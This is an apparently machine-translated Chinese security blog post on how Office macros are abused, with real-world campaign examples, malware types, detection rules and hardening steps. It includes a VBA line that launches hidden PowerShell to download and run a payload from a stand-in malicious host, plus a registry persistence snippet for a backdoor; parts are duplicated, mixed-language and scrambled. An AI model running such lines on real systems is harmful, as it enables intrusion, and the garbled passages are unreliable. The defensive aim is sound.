宏如何构成网络安全风险?
Cyber Threats & Attacks

宏如何构成网络安全风险?

经过 Cyber Lad Team·

如果您曾经使用过 Excel 或 Word,您可能遇到过宏,这些方便的小脚本可以自动执行重复性任务。

但其便利性背后隐藏着网络犯罪分子多年来利用的严重威胁媒介。

宏如何构成网络安全风险启用后,宏可以执行隐藏的代码 在看似无害的文件中。

这使得攻击者能够传播恶意软件、窃取数据,甚至控制整个系统,通常只需毫无戒心的用户单击一下即可。

宏会带来网络安全风险,因为当用户打开受感染的 Office 文件时,它们可能会被利用来执行恶意代码。这使得攻击者能够绕过传统防御并获得对系统的未经授权的访问。

在本博客中,我们将准确解释宏在现实世界的网络攻击中是如何被滥用的、通常通过启用宏的文档传播的恶意软件类型以及您可以采取的保护措施。

Microsoft Office 中的宏是什么?

What Are Macros in Microsoft Office?

Microsoft Office 中的宏是自动的指令序列,可帮助用户更有效地执行重复性任务。

一般写为Visual Basic 应用程序 (VBA)宏用于 Excel、Word 和 Outlook 等应用程序���通过自动执行单元格格式设置、生成报告或发送电子邮件等操作来节省时间并提高工作效率。

例如,用户无需在数千个 Excel 行中手动应用公式,只需单击一下即可运行宏来立即完成此操作。

但是宏如何构成网络安全风险?它们执行代码的能力使它们成为攻击者最喜欢的工具,特别是当用户在不知不觉中启用网络钓鱼文档中的恶意宏时。

宏如何在 Office 文件中工作

宏本质上是嵌入在文档中的小程序。当用户打开包含宏的文件(例如 .xlsm、.docm 或 .pptm 文件)并选择时启用内容,宏代码被执行。

这在自动化报告、计算或工作流程很常见的企业环境中非常有用。

办公应用程序提供开发者选项卡,用户可以启用它来:

  • 无需编码即可录制宏
  • 编写或编辑 VBA 代码。
  • 将宏分配给按钮或快捷方式。

通常包含宏的文件类型

  • .xlsm– Excel 宏启用工作簿
  • .docm– Word 启用宏的文档
  • .pptm– PowerPoint 启用宏的演示
  • .xlam– 带有宏的 Excel 插件

这些文件与其标准对应文件(.xlsx、.docx 等)不同,因为它们允许嵌入代码执行。

阅读更多内容:网络安全中的GRC是什么?您应该知道的一切

为什么宏可能是危险的

虽然宏具有有用的用途,但它们也引入了网络安全风险。由于宏可以执行系统级命令,攻击者经常使用它们来运行恶意负载当毫无戒心的用户启用受感染文档中的内容(通常通过网络钓鱼电子邮件传递)时。

阅读更多内容:网络安全与软件工程:编码还是防御?

为什么宏是流行的攻击媒介

Why Macros Are a Popular Attack Vector?How Do Macros Pose A Cybersecurity Risk?

网络犯罪分子广泛滥用宏,因为它们在 Microsoft Office 中提供了值得信赖的内置自动化功能,可以操纵该功能来执行恶意代码,而通常不会立即引起怀疑。

它们与业务工作流程和用户习惯的集成使它们成为传播恶意软件的理想工具,这是核心原因宏如何构成网络安全风险在个人和企业环境中

1. 宏在系统级别运行代码

宏,用编写Visual Basic 应用程序 (VBA),启用后可以执行系统级命令。这意味着攻击者可以:

  • 下载并运行恶意可执行文件
  • 修改注册表设置
  • 禁用防病毒保护
  • 创建持久性机制

此功能可将简单的 Word 或 Excel 文件转变为对系统进行攻击的远程控制。

阅读更多内容:如何屏蔽wifi路由器的辐射?

2. 非常适合网络钓鱼和社会工程

攻击者通常将启用宏的文档附加到网络钓鱼电子邮件中,伪装成:

  • 发票
  • 人力资源简历
  • 纳税表格
  • 货运追踪表

该电子邮件可能会显示:

“此文档受保护。单击‘启用内容’即可查看。”

一旦用户点击启用内容,嵌入的宏会默默地触发恶意软件的执行。

阅读更多内容:什么是网络安全中的诱饵?不要上当

3. 宏绕过许多传统安全控制

由于宏是合法的 Office 功能,他们经常:

  • 逃避基于签名的防病毒工具
  • 精心设计时可通过垃圾邮件过滤器
  • 如果混淆的话,在沙箱环境中不会被注意到

攻击者还可以使用编码的 VBA 脚本无文件技术,使得检测变得更加困难。

阅读更多内容:如何在离网环境下创办网络安全公司

4. 宏不需要利用漏洞

与零日攻击或复杂的攻击不同,基于宏的攻击不依赖于系统中的缺陷。相反,他们利用用户的信任
这个降低技术门槛打击网络犯罪分子,同时提高成功率。

阅读更多内容:网络安全是否已经饱和?职业指南里面

5、企业广泛使用

由于宏在企业环境中非常常见(用于自动化 Excel 报告、生成财务报表等),因此许多组织:

  • 默认允许使用宏
  • 未能正确限制宏执行策略
  • 缺乏对哪些文档触发宏的可见性

这就创造了完美的风暴:高暴露+低控制=攻击向量机会。

阅读更多内容:没有经验的情况下学习网络安全需要多长时间?

为什么宏是流行的攻击媒介

网络犯罪分子广泛滥用宏,因为它们提供了值得信赖的内置自动化功能在 Microsoft Office 中,可以被操纵执行恶意代码,通常不会立即引起怀疑。它们与业务工作流程和用户习惯的集成使它们成为传播恶意软件的理想工具。

1. 宏在系统级别运行代码

宏,用编写Visual Basic 应用程序 (VBA),启用后可以执行系统级命令。这意味着攻击者可以:

  • 下载并运行恶意可执行文件
  • 修改注册表设置
  • 禁用防病毒保护
  • 创建持久性机制

此功能可将简单的 Word 或 Excel 文件转变为对系统进行攻击的远程控制。

阅读更多内容:Candle 搜索引擎:快如闪电的私人搜索

2. 非常适合��络钓鱼和社会工程

攻击者通常将启用宏的文档附加到网络钓鱼电子邮件中,伪装成:

  • 发票
  • 人力资源简历
  • 纳税表格
  • 货运追踪表

该电子邮件可能会显示:

“此文档受保护。单击‘启用内容’即可查看。”

一旦用户点击启用内容,嵌入的宏会默默地触发恶意软件的执行。

阅读更多内容:网络安全与 Web 开发:哪个更好?

3. 宏绕过许多传统安全控制

由于宏是合法的 Office 功能,他们经常:

  • 逃避基于签名的防病毒工具
  • 精心设计时可通过垃圾邮件过滤器
  • 如果混淆的话,在沙箱环境中不会被注意到

攻击者还可以使用编码的 VBA 脚本无文件技术,使得检测变得更加困难。

阅读更多内容:如何防止病毒和恶意代码?

4. 宏不需要利用漏洞

与零日攻击或复杂的攻击不同,基于宏的攻击不依赖于系统中的缺陷。相反,他们利用用户的信任
这个降低技术门槛打击网络犯罪分子,同时提高成功率。

阅读更多内容:隐身模式与 VPN:哪个能更好地保护您的隐私?

5、企业广泛使用

由于宏在企业环境中非常常见(用于自动化 Excel 报告、生成财务报表等),因此许多组织:

  • 默认允许使用宏
  • 未能正确限制宏执行策略
  • 缺乏对哪些文档触发宏的可见性

这就创造了完美的风暴:高暴露+低控制=攻击向量机会。

阅读更多内容:什么是网络安全中的 CSAM?您需要知道的一切

现实世界中基于宏的攻击示例

宏如何构成网络安全风险?基于宏的攻击不是理论上的;而是基于宏的攻击。它们被用于近代历史上一些最具破坏性和最广泛的网络事件中。

威胁行为者之所以青睐宏,是因为它们的可靠性、影响范围以及通过网络钓鱼活动部署它们的便捷性。让我们看一下现实世界中一些著名的例子,其中恶意宏发挥了核心作用。

1. Emotet 恶意软件活动

表情是最臭名昭著的恶意软件家族之一,严重依赖启用宏的 Word 文档。这些文档通过看似发票或付款提醒的网络钓鱼电子邮件发送,诱骗用户启用宏。启用后:

  • Emotet 会从命令和控制服务器下载自身
  • 它充当其他恶意软件的加载程序,例如TrickBotRyuk 勒索软件
  • 通过网络横向传播,导致大规模违规

影响:在受到的干扰之前,全球范围内受影响的金融机构、政府机构和医疗保健提供商法律2021 年执行。

阅读更多内容:深度搜索引擎:探索 Google 之外

2. Dridex 银行木马

The 德里克斯木马使用带有宏的 Excel 文件来窃取银行凭证:

  • 网络钓鱼电子邮件冒充送货通知或发票
  • 启用宏的用户在不知情的情况下执行了 VBA 代码
  • Dridex 将恶意代码注入浏览器进程以实时捕获银行登录信息

影响:它造成了数百万美元的金融欺诈,并与东欧有组织的网络犯罪集团有关。

3. APT28 (Fancy Bear) – 政治间谍

APT28,一个与俄罗斯国家有关的威胁组织,在期间使用了启用宏的文档。与选举有关的间谍活动。在一个例子中:

  • 他们向政治人物发送鱼叉式网络钓鱼电子邮件,并附有 Word 文档
  • 宏一旦启用,就会下载Seduploader,用于侦察的恶意软件
  • 获得对敏感通信的持续访问

影响:用于美国大选干涉,北约瞄准,和政府监视

阅读更多内容:明网与暗网:主要差异解释

4. COVID-19 网络钓鱼活动 (2020)

在大流行初期,攻击者利用公众的恐惧发送:

  • ���世界卫生组织为主题和卫生部门品牌的文件
  • 执行这些文档中的宏信息窃取者远程访问工具 (RAT)

影响:封锁期间,针对远程工作人员、医院和政府机构的广泛感染。

5.NotPetya(初始向量理论)

虽然不是Petya勒索软件蠕虫主要通过供应链妥协传播,早期报告建议包含宏的 Excel 文件可能已被用来在某些端点上获得初步立足点,尤其是在乌克兰。

攻击名称威胁行为者/恶意软件交货方式宏有效负载结果影响
表情活动Emotet 加载器 + TrickBot网络钓鱼电子邮件中的 Word 文档早期阶段可能的 Excel 文档对金融、医疗保健和政府的全球影响
Dridex 木马Dridex 银行恶意软件Excel/Word 文档作为假发票浏览器注入、银行凭证盗窃银行欺诈造成数百万美元损失
APT28 间谍活动花式熊 / Seduploader针对政治人物的鱼叉式网络钓鱼侦察和后门安装美国大选、北约和政治目标受到损害
COVID-19 诈骗信息窃取者、RAT使用 Office 文档进行以健康为主题的网络钓鱼远程访问、数据泄露2020 年针对远程工作者和医院的攻击激增
NotPetya(理论化)NotPetya 勒索软件蠕虫早期阶段可能的 Excel 文档初步立足点预供应链利用乌克兰、马士基、联邦快递等发生大规模中断

启用恶意宏时会发生什么?

What Happens When a Malicious Macro Is Enabled?

当用户在 Office 文档中启用恶意宏时,它会触发VBA(Visual Basic 应用程序)在 Microsoft Office 的可信上下文中执行代码。

如何宏会带来网络安全风险吗?通过利用这种信任来提供隐秘的、无文件的有效负载、获得持久性并建立对系统的控制,而通常不会立即发出警报。以下是逐步说明所发生情况的技术演练:

第 1 步:通过 VBA Runtime 进行宏初始化

一旦用户点击“启用内容”Office 应用程序将控制权移交给VBA 运行时,它开始执行文档内的嵌入代码。

  • 可以使用自动触发宏事件驱动程序,如:
    • AutoOpen() → 当文档打开时触发 (Word)
    • Workbook_Open() → Excel 打开时触发
    • Document_Open() → 嵌入模板 (.dotm)

这些程序消除了 需要用于启用宏后的用户交互。

第 2 步:通过 Living-Off-the-Land 二进制文件 (LOLBins) 进行有效负载交付

现代宏攻击很少直接删除二进制文件。相反,他们滥用内置 Windows工具秘密下载并执行有效负载。常见的例子包括:

使用的 LOLBins目的
PowerShell.exe下载有效负载,执行混淆命令
mshta.exe执行远程 JavaScript/HTML 应用程序
certutil.exe从网络获取 base64 编码的恶意软件
regsvr32.exe通过 COM scriptlet 运行恶意脚本
rundll32.exe加载并运行 DLL 负载

VBA 片段示例:

Shell “powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command “”IEX(New-Object Net.WebClient).DownloadString(‘http://malicious.site/payload.ps1’) “”

这些进程通常从 Office 应用程序生成,例如 winword.exe 或 excel.exe,这是 EDR/XDR 中的危险信号。

步骤 3:持久性机制

Macros may establish persistence using:

  • Registry keys:HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  • Scheduled Tasks:Created using schtasks.exe via macro-executed PowerShell
  • Startup folders:Dropping a malicious script or shortcut to run on reboot

Example:

Set objShell = CreateObject(“WScript.Shell”)

objShell.RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Backdoor”、“C:\Users\Victim\AppData\backdoor.exe”、“REG_SZ”

步骤 4:命令和控制通信 (C2)

部署有效负载后,它可能会:

  • 通过 HTTP、HTTPS 或 DNS 发送信标base64-encoded payloads
  • to avoid detectionDeploy techniques likedomain frontingor use
  • bulletproof hostingSome macros use encrypted strings or string obfuscation in VBA to hide C2 URLs and evade static detection.Step 5: Final Payload ExecutionFinal-stage payloads vary based on attacker objectives:

Ransomware:

Encrypt files and display a ransom note

Infostealers:

  • Grab saved browser credentials, clipboard content, cookiesRATs:
  • Enable real-time surveillance, keylogging, and screen captureCredential Dumpers:
  • Dump LSASS memory using procdump.exe or mimikatzDetection Footprint (Technical Artifacts)
  • ArtifactWhat to Monitor

Office spawning PowerShell

winword.exe → powershell.exeSuspicious registry edits
REG ADD in logsNetwork traffic to unknown domains
Use threat intel feeds to correlateFile drops in AppData, Temp
Especially .dll, .ps1, .vbsSIEMs can write
detection rulesaround Office process trees, script execution anomalies, and registry persistence

activity.To avoid detection, attackers经常:混淆技术使用编码的 PowerShell 有效负载

通过宏提供的恶意软件类型

长期以来一直被攻击者利用,特别是因为它们可以在受信任的 Microsoft Office 应用程序中执行任意代码。网络安全风险?

  • Split VBA strings using Chr() or base64
  • Use encoded PowerShell payloads
  • Dynamically download shellcode to memory (fileless malware)

Types of Malware Delivered via Macros 

Macros have long been exploited by attackers as initial access vectors, especially because they can execute arbitrary code within the context of trusted Microsoft Office applications.

How Do Macros Pose A Cybersecurity Risk?通过充当高级恶意软件的启动板,允许威胁行为者绕过端点防御并悄悄地危害系统。

一旦用户在恶意文档中启用宏,攻击者就可以传播各种恶意软件,从勒索软件和银行木马到隐秘的无文件恶意软件。

以下是通过恶意宏传播的最常见恶意软件类型的技术详细说明,包括执行流程、用例,以及值得注意的例子。

1.  勒索软件

说明:

勒索软件会对用户的文件进行加密,并要求付款(通常以加密货币形式)才能恢复访问。它还可以包括双重勒索,其中数据在加密之前被泄露。

如何使用宏:

  • 该宏启动PowerShell或 cmd.exe 命令来下载勒索软件负载。
  • 它可能会使用离地谋生二元星 (LOLBins)像bitsadmin或certutil一样来获取加密或混淆的二进制文件。
  • 有效负载使用 rundll32.exe 执行,通常注入到合法进程中。

���实世界的例子:

  • 琉克,锁位,和迷宫全部都是通过基于宏的网络钓鱼攻击而丢失的,通常是在 Emotet 和 TrickBot 感染之前发生的。

技术指标:

  • Office → PowerShell → 勒索软件 EXE
  • 创建了 .ryk、.lockbit 等文件扩展名
  • 与 TOR 隐藏服务的 C2 连接

2. 远程访问木马 (RAT)

说明:

RAT 提供对受感染系统的完全远程访问,并且可以执行任意命令、记录击键、截取屏幕截图,甚至激活网络摄像头和麦克风。

宏观攻击流程:

  • 宏删除或下载混淆的RAT 二进制,通常伪装成 .dll 或 .txt
  • 中注册 RAT香港中大跑注册表项或计划任务
  • 通过注册表或启动文件夹维护持久性

通过宏提供的常见 RAT:

  • 类星体老鼠
  • 纳米核心
  • 代理特斯拉
  • 暗彗星

技术指标:

  • Office 应用程序 → regsvr32.exe → DLL 执行
  • 通过隐藏的 PowerShell 启动反向 TCP shell
  • 动态 DNS (DDNS) 域的信标行为

3.  银行木马

说明:

银行木马是专门的恶意软件,它们监视浏览器会话以窃取金融平台的登录凭据。

���观攻击流程:

  • 宏触发器PowerShell 或 MSHTA下载 Dridex、Ursnif 或 TrickBot 等恶意软件
  • 将自身注入浏览器进程(例如 chrome.exe、iexplore.exe)
  • 用途抓取表格,浏览器中的人 (MitB),或网络注入捕获数据

示例:

  • 德里克斯通过恶意 Excel 附件传递,使用混淆的 VBA 宏和 XOR 编码来逃避检测。

技术指标:

  • chrome.exe 中加载了意外的 DLL
  • 流向虚假银行域的加密流量
  • 修改浏览器库或代理

4.  信息窃取者

说明:

信息窃取者会悄悄地从受害者的系统中收集数据,包括登录凭据、浏览器历史记录、cookie、剪贴板内容、保存的信用卡信息,甚至加密货币钱包。

宏用法:

  • VBA 宏执行脚本到下载并运行 EXE 负载在临时目录中
  • 有效负载抓取本地存储中的凭据并通过 HTTP POST
  • 发送通常包括反VM,反沙箱,和反调试技术

流行的信息窃取者:

  • 表格
  • 红线
  • 维达尔
  • LokiBot

技术指标:

  • 具有 Base64 编码的 POST 请求的网络流量
  • 收集到的数据被压缩并渗透到 C2 服务器
  • 通过计划任务和注册表项进行持久化

5.  无文件恶意软件

说明:

与传统恶意软件不同,无文件恶意软件完全驻留在内存中。它避免将任何内容写入磁盘,从而使其极其隐秘并且防病毒软件更难检测到。

宏执行:

  • VBA 宏启动混淆PowerShell 一行
  • 代码使用 Invoke-Expression (IEX)
  • 将 shellcode 或有效负载直接注入内存中使用类似的工具甜甜圈装载机,反射DLL注入,或PowerShell帝国

示例:

  • APT29芬7一些组织使用宏来部署无文件恶意软件,以在企业网络内进行间谍活动和横向移动。

技术指标:

  • PowerShell 从 winword.exe 或 excel.exe 生成
  • 没有二进制文件写入磁盘
  • 内存分析揭示合法进程中注入的 shellcode

6. 下载器和加载器

说明:

这些是轻量级程序,其唯一的工作是下载并执行二级恶意软件,通常用于多阶段攻击。

宏如何参与:

  • 宏会删除加载器脚本,例如GootLoader,ZLoader,或烟雾装载机
  • ���载器连接到 C2,获取加密或多态负载
  • 下一阶段的恶意软件是动态执行的,通常通过进程注入

技术指标:

  • 初始 Office 文档具有最小大小
  • 存在脚本化延迟或沙箱规避逻辑
  • 第二阶段有效负载行为因时间、地理位置或语言而异
恶意软件类型主要目标通过宏传递使用关键行为值得注意的例子检测难度
勒索软件加密文件以获取赎金PowerShell / certutil / LOLBins加密本地和网络文件,删除勒索信Ryuk、LockBit、迷宫⚠️ 中
远程访问木马 (RAT)全程远程控制VBScript / DLL 删除 / 注册表持久化VBScript / DLL 删除/注册表持久化NanoCore、AgentTesla、Quasar✅ 高
银行木马窃取银行凭证Office VBA → PowerShell → EXE浏览器注入、Web 注入、表单抓取Dridex、Ursnif、TrickBot✅ 高
信息窃取者窃取凭证和会话数据混淆的脚本和负载下载窃取密码、cookie、剪贴板数据、加密钱包文件RedLine、Vidar、FormBook✅ 高
无文件恶意软件在内存中隐形执行PowerShell 单行代码 (IEX)反射DLL注入,无磁盘活动,规避传统反病毒FIN7 工具,帝国✅✅ 非常高
下载器/加载器交付第二阶段有效载荷宏 → 小存根 → C2 获取下载并运行有效负载、沙箱规避、持久性设置GootLoader、ZLoader✅ 高

如何检测基于宏的攻击

检测基于宏的攻击需要的组合端点可见性,日志分析,和用户行为监控

由于宏利用合法办公室功能并可以执行隐秘脚本,传统的防病毒解决方案常常会错过它们。以下是蓝色团队和 SOC 分析师用来检测恶意宏活动的有效技术和工具。

1.监控可疑的父子进程树

恶意宏通常会导致异常进程生成行为,如:

  • WINWORD.EXE → POWERSHELL.EXE
  • EXCEL.EXE → CMD.EXE → BITSADMIN.EXE
  • OUTLOOK.EXE → MSHTA.EXE

使用EDR这样的工具Microsoft Defender 端点,CrowdStrike,或SentinelOne针对涉及 Office 应用程序的异常进程链发出警报。

2. 基于宏的检测的 SIEM 规则示例

这是一个简单的Sigma 规则式逻辑用于通过 PowerShell 检测宏执行:

标题:Office 应用程序生成 PowerShell

日志来源:

类别: process_creation

产品:Windows

检测:

选择:

父图像|包含:

– ‘winword.exe’

– ‘excel.exe’

– ‘powerpnt.exe’

图片|结尾为:‘powershell.exe’

条件:选择

集成到 SIEM,如斯普朗克,弹性(ELK),或微软哨兵

3. 监控注册表和文件系统工件

恶意宏经常创建持久化机制像:

  • 注册表路径:
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    • HKCU\Software\Microsoft\Office\<版本>\Word\Security
  • 已将文件拖放到:
    • %APPDATA%、%TEMP% 或启动文件夹
    • .vbs、.ps1、.lnk 文件

使用系统监控瓦祖迅猛龙监视注册表修改和删除的文件。

4. 检测可疑网络行为

宏通常:

  • 发起HTTP/HTTPS 请求未知域
  • 信标命令与控制 (C2)服务器
  • 使用非浏览器用户代理,例如 Microsoft Office Word 12.0

Tools like 等工具泽克,苏里卡塔,或者你的NGFW(下一代防火墙)可以检测到这些异常情况。
整合威胁情报源关联出站流量。

5. 行为沙箱

使用动态分析工具引爆中的Office文档沙箱环境(例如,Joe SandboxAny.Run混合分析)。这些工具揭示了:

  • VBA 宏执行
  • PowerShell 命令
  • 文件写入和网络活动
  • 尝试通过延迟或环境检查来逃避沙箱

6. 基于用户的异常检测

跟踪用户行为中的异常情况,例如:

  • 非管理员突然通过 Word 执行 PowerShell
  • 从外部文档重复启用宏
  • 打开启用宏的文档后不久访问敏感文件

使用欧洲联盟联合会(用户和实体行为分析)将基于宏观的异常与用户风险评分相关联。

推荐检测工具:

工具使用案例
Sysmon + ELK 堆栈低级遥测+日志关联
Microsoft Defender ATP端点检测+内存扫描
迅猛龙端点取证监控(开源)
西格玛规则基于 SIEM 的检测逻辑
泽克 + 苏里卡塔网络级宏检测
CAPE 沙箱 / Any.Run记录爆炸和有效载荷追踪

提示:组合遥测层

要增加检测置信度:

  • 关联进程创建日志+注册表写入+DNS 查询
  • 警报Office 子进程,具有模糊参数的 PowerShell,或非浏览器网络流量

宏如何给组织带来网络安全风险?

How Do Macros Pose a Cybersecurity Risk in Organizations?

在企业环境中,宏通常用于自动化财务、人力资源、运营和供应链职能部门的日常任务。

然而,这种合法功能往往伴随着隐藏的威胁。宏如何构成网络安全风险?

当滥用时,它们可以充当隐蔽的频道对于恶意软件的传播,造成了便利性和脆弱性的危险结合。

以下是宏专门针对组织和企业网络带来的主要网络安全风险��

1. 宏利用内部工作流程中的信任

员工通常通过以下方式接收文件:

  • 内部电子邮件转发
  • 共享网络驱动器
  • Teams 或 SharePoint 等协作平台

攻击者通过以下方式利用这种信任:

  • 在看似来自内部用户或业务合作伙伴的文档中嵌入恶意宏
  • 使用模板注入内容欺骗绕过基本审查

单击“启用内容”可能会危及整个业务部门。

2. 宏允许跨网络横向移动

初步妥协后:

  • 攻击者可以使用PowerShell 脚本凭证转储宏提供的工具
  • 利用受损账户进行横向转移(例如,从财务系统转移到 IT 系统)
  • 使用远程执行工具(例如 PsExec、WMI)传播有效负载

在许多勒索软件事件中,最初的感染点是发送给低权限用户的启用宏的文档。

3. 宏针对高���值部门

宏经常用于攻击以下部门:

  • 处理敏感数据(人力资源、法律、财务)
  • 有权访问支付系统或内部数据库
  • 经常打开外部文档来自供应商或客户

示例:带有感染应付账款团队的宏的虚假发票可能会导致财务欺诈或电汇操纵。

4. 许多组织默认不阻止宏

即使在今天:

  • 许多 Microsoft 365 环境仍然允许受信任文档中的宏
  • 组策略对象 (GPO) 经常配置错误或过时
  • 来自云共享或电子邮件附件的宏仍然可执行

宏观治理中的这种差距造成了威胁行为者的低门槛入口点

5. 宏可以逃避企业安全控制

复杂的宏恶意软件经常使用:

  • 混淆(例如,字符串分割、Chr() 编码)
  • 离地谋生技术(PowerShell、mshta、certutil)
  • 无文件有效负载生活在记忆中

这些行为:

  • 绕过传统防病毒 (AV)
  • 不被遗留入侵检测系统 (IDS) 检测到
  • 利用不受监控的 Office 应用程序行为

6. 合规与法律风险

宏观触发的违规行为可能使组织面临:

  • 违反 GDPR、HIPAA 或 PCI-DSS如果敏感数据遭到泄露
  • 数据处理不当的法律后果
  • 失去客户信任和商业声誉

7. 难以培训非技术用户

宏要求最终用户做出启用或阻止它们的决定。在大型组织中:

  • 安全意识不一致
  • 员工可能会出于习惯启用内容
  • 攻击者使用社交工程短语,例如:


    “启用内容以正确查看文档。”

真实案例研究:

在一家跨国物流公司中,一张启用宏的 Excel 发票感染了一个端点。数小时内,攻击者使用窃取的 AD 凭据进行横向移动,并在 700 多个系统上部署勒索软件。

如何防止宏攻击:最佳实践

How to Prevent Macro Attacks: Best Practices

在企业环境中,由于合法的业务用例,完全禁止宏可能不切实际。相反,组织必须采用分层防御策略平衡可用性和安全性。

以下是在不中断操作工作流程的情况下从技术上防止基于宏的攻击的综合指南。

1. 阻止来自 Internet 的文件中的宏(MotW 控制)

微软在 Office 应用程序中引入了一项功能来阻止文档中的宏标记为从网络下载使用网络标志 (MotW)属性。这会停止最常见的攻击媒介:网络钓鱼附件和下载

��何启用:

使用组策略或 Microsoft Intune:

路径:用户配置 → 管理模板 → Microsoft Office [版本] → 安全设置 → 信任中心

设置:阻止宏在来自 Internet 的 Office 文件中运行 → 启用

  • 适用于 .docm、.xlsm、.pptm、.xlam

优点:使用 MotW (Zone.Identifier) 阻止文件中的宏,而不影响内部宏工作流程。

2. 使用组策略禁用所有宏

对于不需要宏的高度安全的环境,完全禁用宏功能是最好的选择。

配置:

GPO 路径:

用户配置 → 管理模板 → Microsoft Office → 安全设置 → VBA 宏通知设置

  • 推荐设置:
      “禁用所有宏而不通知。”

这会阻止宏执行完全,包括来自签署的文件,提供最大程度的保护

用于 SOC、法律部门和执行端点,其中宏的使用不是日常任务的一部分。

3. 启用并实施受保护的视图

受保护的视图中打开有潜在风险的 Office 文件沙盒只读容器,在明确信任之前不允许执行任何宏。

如何启用:

前往:

  • 文件 → 选项 → 信任中心 → 信任中心设置 → 受保护视图
  • 启用所有复选框:
    • “为来自互联网的文件启用受保护的视图”
    • “启用 Outlook 附件的受保护视图”
    • “为位于潜在不安全位置的文件启用受保护的视图。”

这可以防止用户在不受信任的文件中执行嵌入代码,除非他们专门退出受保护的视图。

4. 最终用户安全意识培训

即使有技术控制,用户仍然是关键目标用于社会工程。宏通常与如下消息一起传递:

“该文档已加密。请启用内容才能查看。”

培训要点:

  • 使用等工具模拟宏网络钓鱼攻击网络钓鱼微软攻击模拟器
  • 每季度进行一次基于宏观的网络钓鱼宣传活动
  • 提供现实生活中因宏滥用而导致的违规示例

培训用户从不启用宏在电子邮件附件或下载的文档中,除非它们源自批准的内部工作流程

5. 使用应用程序控制:AppLocker / Microsoft Defender 应用程序控制 (MDAC)

攻击者经常利用离地谋生二元星 (LOLBins)例如从宏代码启动的 PowerShell、WMI、mshta 和 certutil。

通过 AppLocker/MDAC 进行预防:

  • 限制执行:
    • powershell.exe
    • wscript.exe、cscript.exe
    • mshta.exe
    • regsvr32.exe
  • 执行宏观政策:
    • 仅允许签名宏
    • 阻止未签名或经过 Base64 混淆的脚本

MDAC 可以对可执行的脚本和二进制文件进行精细控制,甚至可以从 Microsoft Office 等受信任的应用程序执行。

6. 保护您的电子邮件和端点网关

由于宏经常通过进入组织电子邮件,保护您的电子邮件层至关重要。

电子邮件安全最佳实践:

  • 使用支持沙箱的安全电子邮件网关:
    • 适用于 Office 365 的 Microsoft Defender
    • Proofpoint TAP
    • Mimecast 针对性威胁防护
  • 删除或隔离 .docm、.xlsm、.pptm 附件
  • 使用DMARC,DKIM,和防晒指数用于电子邮件验证
  • 启用零时自动清除(ZAP) 在 Microsoft 365 中追溯删除网络钓鱼电子邮件

添加 EDR 工具(例如 Defender ATP、CrowdStrike、SentinelOne)以检测 Office 生成的异常进程。

7. 使用数字签名的宏和宏白名单

如果您的业务依赖于宏:

  • 使用对内部宏进行数字签名企业证书颁发机构
  • 将 Office 配置为仅运行已签名的宏

如何:

  • 使用 SelfCert.exe 生成测试证书或与您的 PKI 集成
  • 在信任中心设置中:
    • 检查“禁用除数字签名宏之外的所有宏。”

将此与结合起来宏白名单,仅允许执行预先批准的宏。

最后的想法

所以,宏如何构成网络安全风险?答案在于它们的双重性。虽然宏旨在通过自动化 Microsoft Office 中的任务来提高工作效率,但攻击者也可以轻松利用宏来传播勒索软件、远程访问木马、银行恶意软件和其他恶意负载。

对于组织和个人来说,真正的危险不是来自宏本身,而是来自安全政策不完善、缺乏意识、可见性差Office 文件行为。

在网络钓鱼电子邮件和恶意附件成为主要威胁的世界中#1 攻击向量,单击“启用内容”的简单行为可能是全面违规的开始��

要点:

  • 始终以怀疑的态度对待启用宏的文档(.docm、.xlsm、.pptm)
  • 实施分层防御,包括GPO 硬化,EDR,沙箱,和用户培训
  • 除非必要,否则禁用宏,并使用宏签名和白名单在需要的地方
  • 密切监控 Office 应用程序的行为,尤其是当它们生成 PowerShell 或 MSHTA 等脚本引擎时

需要帮助保护您的办公环境吗?

担心宏如何给您的组织带来网络安全风险?
不要让您的系统容易受到单击的影响。

  • 获取免费宏攻击面审计
  • 识别高风险工作流程和用户行为
  • 接收针对 Microsoft 365 的切实可行的强化建议

联系 Cyber​​Lad 的安全团队 并采取第一步来缩小安全态势中的这一关键差距。

常见问题

启用宏是否存在网络安全风险?

是的。在 Microsoft Office 文件中启用宏可能会允许恶意代码自动运行,从而导致数据被盗、系统受损或勒索软件、键盘记录器或特洛伊木马等恶意软件感染。宏经常在网络钓鱼活动中被滥用,以启动网络攻击的第一阶段。

历史上最大的网络攻击有哪些?

震网针对伊朗核计划,被认为是针对物理基础设施的第一个数字武器。

想哭使用勒索软件影响了全球 200,000 多台计算机。

不是Petya伪装成勒索软件的破坏性恶意软件造成了超过 100 亿美元的损失。

主要宏观(经济)风险有哪些?

宏观经济风险包括全球贸易不稳定、地缘政治紧张、资本市场波动、保护主义和全球经济力量转移。这些都是可能破坏经济、工业和国际商业稳定的大规模问题。

90% 的网络事件从哪里开始?

超过 90% 的成功网络攻击都是从网络钓鱼电子邮件开始的。这些电子邮件诱骗用户点击恶意链接、打开受感染的附件(通常启用宏)或泄露密码或个人数据等敏感信息。

80% 的网络攻击涉及什么?

超过 80% 的违规行为涉及弱密码或被盗密码。当与网络钓鱼和基于宏的恶意软件等其他风险相结合时,不良的密码卫生允许攻击者升级权限并在网络内横向移动。

准备好受到保护了吗?

立即开始您的安全之旅

与我们的网络安全专家免费咨询。无需承诺。